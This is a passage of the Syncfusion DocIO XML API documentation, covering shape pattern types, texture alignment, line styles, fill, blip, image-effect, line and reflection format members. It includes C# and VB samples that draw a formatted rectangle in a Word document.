        <member name="F:Syncfusion.DocIO.DLS.PatternType.NarrowVertical">
            <summary>
            Narrowly spaced vertical lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.OutlinedDiamond">
            <summary>
            Solid perpendicular lines in the foreground color running diagonally to form diamonds across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Plaid">
            <summary>
            Very thick solid lines in the foreground color running vertically, coupled with very thick lines and 40% of the foreground color running horizontally.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Shingle">
            <summary>
            Overlapping curved rectangles running diagonally across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.SmallCheckerBoard">
            <summary>
            Small squares in alternating foreground/background colors.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.SmallConfetti">
            <summary>
            Small dots in the foreground color scattered across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.SmallGrid">
            <summary>
            Solid, closely spaced perpendicular lines in the foreground color running horizontally and vertically to form grid lines across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.SolidDiamond">
            <summary>
            Diamond shapes in alternating foreground/background colors.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Sphere">
            <summary>
            Circles that use foreground and background colors to make them appear three-dimensional, oriented in rows across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Trellis">
            <summary>
            Trellis pattern in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.UpwardDiagonal">
            <summary>
            Upward Diagonal
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Vertical">
            <summary>
            Vertical
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Wave">
            <summary>
            Wavy lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Weave">
            <summary>
            Weave pattern in the foreground color running diagonally across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.WideDownwardDiagonal">
            <summary>
            Widely spaced lines in the foreground color running from the top to the right-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.WideUpwardDiagonal">
            <summary>
            Widely spaced lines in the foreground color running from the top to the left-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.ZigZag">
            <summary>
            Zigzag lines running horizontally across the shape.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextureAlignment">
            <summary>
            Specifies the texture alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.AlignmentMixed">
            <summary>
            Not Supported.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.Bottom">
            <summary>
            Aligned at bottom.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.BottomLeft">
            <summary>
            Aligned at bottom left.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.BottomRight">
            <summary>
            Aligned at bottom right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.Center">
            <summary>
            Aligned at center.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.Left">
            <summary>
            Aligned at left.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.Right">
            <summary>
            Aligned at right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.Top">
            <summary>
            Aligned at top.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.TopLeft">
            <summary>
            Aligned at top left.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextureAlignment.TopRight">
            <summary>
            Aligned at top right.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LineStyle">
            <summary>
            Specifies the style for a line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineStyle.Single">
            <summary>
            Single line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineStyle.StyleMixed">
            <summary>
            Not supported.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineStyle.ThickBetweenThin">
            <summary>
            Thick line with a thin line on each side.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineStyle.ThickThin">
            <summary>
            Thick line next to thin line. For horizontal lines, thick line is above thin line. For vertical lines, thick line is to the left of the thin line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineStyle.ThinThick">
            <summary>
            Thick line next to thin line. For horizontal lines, thick line is below thin line. For vertical lines, thick line is to the right of the thin line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineStyle.ThinThin">
            <summary>
            Two thin lines.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FillFormat">
            <summary>
            Represents the fill format options for the <see cref="T:Syncfusion.DocIO.DLS.Shape"/> in the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to set the fill format to the shape in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into Word document
                WSection section = document.AddSection() as WSection;
                //Add a paragraph to created section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add a paragraph to created section
                paragraph = section.AddParagraph() as WParagraph;
                //Add the rectangle shape to the document
                Syncfusion.DocIO.DLS.Shape shape = paragraph.AppendShape(AutoShapeType.Rectangle, 200, 75);
                //Set wrapping type as inline
                shape.WrapFormat.TextWrappingStyle = TextWrappingStyle.Inline;
                //Set the fillformat for the shape
                shape.FillFormat.Color = Color.AliceBlue;
                shape.FillFormat.Fill = true;
                shape.FillFormat.Transparency = 60;
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into Word document
                Dim section As WSection = TryCast(document.AddSection(), WSection)
                'Add a paragraph to created section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add a paragraph to created section
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                'Add the rectangle shape to the document
                Dim shape As Syncfusion.DocIO.DLS.Shape = paragraph.AppendShape(AutoShapeType.Rectangle, 200, 75)
                'Set wrapping type as inline
                shape.WrapFormat.TextWrappingStyle = TextWrappingStyle.Inline
                'Set the fillformat for the shape
                shape.FillFormat.Color = Color.AliceBlue
                shape.FillFormat.Fill = True
                shape.FillFormat.Transparency = 60
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.Shape"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FillFormat.#ctor(Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.FillFormat"/> class.
            </summary>
            <param name="shape">The <see cref="T:Syncfusion.DocIO.DLS.Shape"/> to which the fill effects should be added.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FillFormat.#ctor(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.FillFormat"/> class.
            </summary>
            <param name="picture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> to which the fill effects should be added.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FillFormat.Clone">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FillFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FillFormat.Fill">
            <summary>
            Gets or sets a value indicating whether to fill with color. 
            </summary>
            <value><b>True</b> if need to fill with color; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FillFormat.Color">
            <summary>
            Gets or sets the color to fill
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> specifies the fill color.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FillFormat.Transparency">
            <summary>
            Gets or sets the transparency value measured in percentage(%).
            </summary>
            <value>The <b>float</b> that represents the transparency value.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BlipFormat.Close">
            <summary>
            Close the instances.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BlipFormat.Clone">
            <summary>
            Clones the blip format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BlipFormat.HasKey(System.Int32)">
            <summary>
            
            </summary>
            <param name="propertyKey"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Threshold">
            <summary>
            Blip Threshold
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.InverseColor">
            <summary>
            Blip inverse color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.InverseOpacity">
            <summary>
            Blip inverse opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.AlphaReplaceAmount">
            <summary>
            Alpha replacement amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.BilevelThreshold">
            <summary>
            Bevel Threshold value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Grow">
            <summary>
            Flag to make the glow effect grow
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.BlurRadius">
            <summary>
            value for blur radius
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.HasAlpha">
            <summary>
            Flag to denote the alpha
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.ColorFrom">
            <summary>
            Color from value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.ColorTo">
            <summary>
            color to value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.ColorFromOpacity">
            <summary>
            color from opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.ColorToOpacity">
            <summary>
            Color to opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Hue">
            <summary>
            Hue value of blip
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Luminance">
            <summary>
            Luminance value of blip
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Saturation">
            <summary>
            Saturation value of blip
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Brightness">
            <summary>
            Brightness value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Contrast">
            <summary>
            Contrast value of blip
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.TintAmount">
            <summary>
            Tint Amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.TintHue">
            <summary>
            Tint Hue
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.DuotoneColor">
            <summary>
            Duotone color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.DuotonePresetColor">
            <summary>
            Duotone Preset color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.DuotoneOpacity">
            <summary>
            Duotone opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.ExtensionURI">
            <summary>
            Collection of extension URI
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.ImageEffect">
            <summary>
            Image Effect of the blip picture
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.HasCompression">
            <summary>
            Has to apply compression
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.HasImageProperties">
            <summary>
            Blip has image properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.RotateWithObject">
            <summary>
            Gets/Sets the blip rotation with shape object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.ImageRecord">
            <summary>
            Image Record
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.DocxProps">
            <summary>
            Stream for blip extensions
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BlipFormat.Transparency">
            <summary>
            Gets or sets the transparency value measured in percentage(%).
            </summary>
            <value>The <b>float</b> that represents the transparency value.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageEffect.SetKeyValue(System.Int32,System.Object)">
            <summary>
            Sets the property key
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageEffect.Close">
            <summary>
            Disposes the instances used.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageEffect.Clone">
            <summary>
            Clones the instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.SharpenAmount">
            <summary>
            Sharpen Amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.ColorTemprature">
            <summary>
            Color Temprature
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.Saturation">
            <summary>
            Saturation
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.Brightness">
            <summary>
            Brightness Value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.Contrast">
            <summary>
            Contrast value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.BlurRadius">
            <summary>
            Blur radius
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.CementTransparency">
            <summary>
            Cement Trasparency amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.CementCracking">
            <summary>
            Cement cracking amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.ChalkSketchTransparency">
            <summary>
            Chalk transparency amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.ChalkSketchPressure">
            <summary>
            Chalk Pressure
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.CrisscrossEtchingTransparency">
            <summary>
            criss cross transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.CrisscrossEtchingPressure">
            <summary>
            criss cross pressure
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.CutoutTransparency">
            <summary>
            cutout opacity amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.CutoutShades">
            <summary>
            Cutout shades
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GrainTransparency">
            <summary>
            Grain transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GrainSize">
            <summary>
            Grain Size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GlassTransparency">
            <summary>
            Glass opacity amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GlassScaling">
            <summary>
            Glass Scaling amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GlowDiffusedTransparency">
            <summary>
            Glow diffusity opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GlowDiffusedIntensity">
            <summary>
            Glow diffusity intensity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GlowEdgesTransparency">
            <summary>
            Glow Edges opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.GlowEdgesSmoothness">
            <summary>
            Glow edges smoothness
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.LightScreenTransparency">
            <summary>
            Light screen opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.LightScreenGrid">
            <summary>
            Light screen Grid
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.LineDrawingTransparency">
             <summary>
            Line drwaing opacity
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.LineDrawingPensilSize">
            <summary>
            Drawing Pensil size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.MarkerTransparency">
            <summary>
            Marker Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.MarkerSize">
            <summary>
            Marker Size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.MosiaicBubbleTransparency">
            <summary>
            Mosiaic Bubble Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.MosiaicBubblePressure">
            <summary>
            Mosiaic Bubble Pressure
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.StrokeTransparency">
             <summary>
            Stroke Transparency
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.StrokeIntensity">
            <summary>
            stroke intensity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.BrushTransparency">
            <summary>
            Brush Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.BrushSize">
            <summary>
            Brush Size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PastelTransparency">
            <summary>
            Pastel Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PastelSize">
            <summary>
            Pastel Size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PencilGrayScaleTransparency">
            <summary>
            Gray Scale Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PencilGraySize">
            <summary>
            Gray scale size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PencilSketchTransparency">
            <summary>
            Pencil Sketch Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PencilSketchSize">
            <summary>
            Pencil Sketch Size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PhotocopyTransparency">
            <summary>
            Photocopy Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PhotocopySize">
            <summary>
            Photocopy size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PlasticWrapTransparency">
            <summary>
            Plastic Wrap Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PlasticWrapSmoothness">
            <summary>
            Plastic Wrap Smoothness
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.TexturizerTransparency">
            <summary>
            Texturizer Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.TexturizerSize">
            <summary>
            Texturizer Size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.SpongeTransparency">
            <summary>
            Sponge Transparency
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.SpongeBrushSize">
            <summary>
            Sponge brush size
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.ForegroundVertices">
            <summary>
            Collection of Foreground vertices
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.BackgroundVertices">
            <summary>
            Collection of background vertices
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.BackgroundRemovalRectangle">
            <summary>
            Background removal rectangle 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.HasBackgroundRemovalEffect">
            <summary>
            Has the background removal effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageEffect.PropertiesHash">
            <summary>
            Properties Collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GlowFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GlowFormat.Clone">
            <summary>
            Clones this instance.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LineFormat">
            <summary>
            Represents the line format options for the <see cref="T:Syncfusion.DocIO.DLS.Shape"/> in the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to set the line format to the shape in the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into Word document
                WSection section = document.AddSection() as WSection;
                //Add a paragraph to created section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add a paragraph to created section
                paragraph = section.AddParagraph() as WParagraph;
                //Add the rectangle shape to the document
                Syncfusion.DocIO.DLS.Shape shape = paragraph.AppendShape(AutoShapeType.Rectangle, 200, 75);
                //Set wrapping type as inline
                shape.WrapFormat.TextWrappingStyle = TextWrappingStyle.Inline;
                //Set the line format for the shape
                shape.LineFormat.Line = true;
                shape.LineFormat.Color = Color.Red;
                shape.LineFormat.DashStyle = LineDashing.DashDot;
                shape.LineFormat.Style = Syncfusion.DocIO.DLS.LineStyle.ThickThin;
                shape.LineFormat.Weight = 3;
                shape.LineFormat.Transparency = 30;
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into Word document
                Dim section As WSection = TryCast(document.AddSection(), WSection)
                'Add a paragraph to created section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add a paragraph to created section
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                'Add the rectangle shape to the document
                Dim shape As Syncfusion.DocIO.DLS.Shape = paragraph.AppendShape(AutoShapeType.Rectangle, 200, 75)
                'Set wrapping type as inline
                shape.WrapFormat.TextWrappingStyle = TextWrappingStyle.Inline
                'Set the line format for the shape
                shape.LineFormat.Line = True
                shape.LineFormat.Color = Color.Red
                shape.LineFormat.DashStyle = LineDashing.DashDot
                shape.LineFormat.Style = Syncfusion.DocIO.DLS.LineStyle.ThickThin
                shape.LineFormat.Weight = 3
                shape.LineFormat.Transparency = 30
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.Shape"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.LineFormat.#ctor(Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.LineFormat"/> class for the specified <see cref="T:Syncfusion.DocIO.DLS.Shape"/>.
            </summary>
            <param name="shape">The <see cref="T:Syncfusion.DocIO.DLS.Shape"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.LineFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.LineFormat.HasKey(System.Int32)">
            <summary>
            Check for the property key from the property collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.LineFormat.Clone">
            <summary>
            Clones this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.Line">
            <summary>
            Gets or sets the value indicating whether the outline of the shape should be drawn. The default is <b>false</b>.
            </summary>
            <value><b>True</b> if the outline should be drawn; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.Color">
            <summary>
            Gets or sets a <see cref="T:System.Drawing.Color"/> for the outer line of the shape.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> object that specifies line color.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.BeginArrowheadStyle">
            <summary>
            Gets or sets the style of the arrowhead at the beginning of the specified line.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.DashStyle">
            <summary>
            Gets or sets the <see cref="T:Syncfusion.DocIO.LineDashing"/> for the outline of the shape. 
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.LineDashing"/> member that specifies the line dashing style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.EndArrowheadStyle">
            <summary>
            Gets or sets the style of the arrowhead at the end of the specified line.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.Style">
            <summary>
            Gets or sets the outline style for the shapes.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.LineStyle"/> member that specifies the line style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.Transparency">
            <summary>
            Gets or sets the transparency value measured in percentage(%).
            </summary>
            <value>The <b>float</b> that specifies the transparency value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.Weight">
            <summary>
            Gets or sets a value for the line weight measured in points.
            </summary>
            <value>The <b>float</b> that represents the line weight.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LineFormat.MiterJoinLimit">
            <summary>
            Gets or sets the miter join limit.
            </summary>
            <value>
            The miter join limit.
            </value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Reflection.BlurRadiusKey">
            <summary>
            Key values
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Reflection.m_blurRadius">
            <summary>
            Fields
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Reflection.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Reflection.Clone">
            <summary>
            Clones this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.Blur">
            <summary>
            Reflection blur radius
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.Direction">
            <summary>
            Specifies the direction to offset the shadow
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.Offset">
            <summary>
            Specifies the how far to offset the shadow
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.Transparency">
            <summary>
            Specifies the start reflection opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.StartPosition">
            <summary>
            Specifies the start position of start opacity 
            </summary>
            
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.EndOpacity">
            <summary>
            Specifies the end reflection opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.Size">
            <summary>
            Specifies the end position of end opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.FadeDirection">
            <summary>
            Specifies the fade direction of reflected shadow
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.HorizontalSkew">
            <summary>
            Specifies the angle of horizontal skew
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.VerticalSkew">
            <summary>
            Specifies the angle of vertical skew
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.HorizontalRatio">
            <summary>
            Specifies the percentage of horizontal ratio
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.VerticalRatio">
            <summary>
            Specifies the percentage of vertical ratio
            </summary>
        </member>
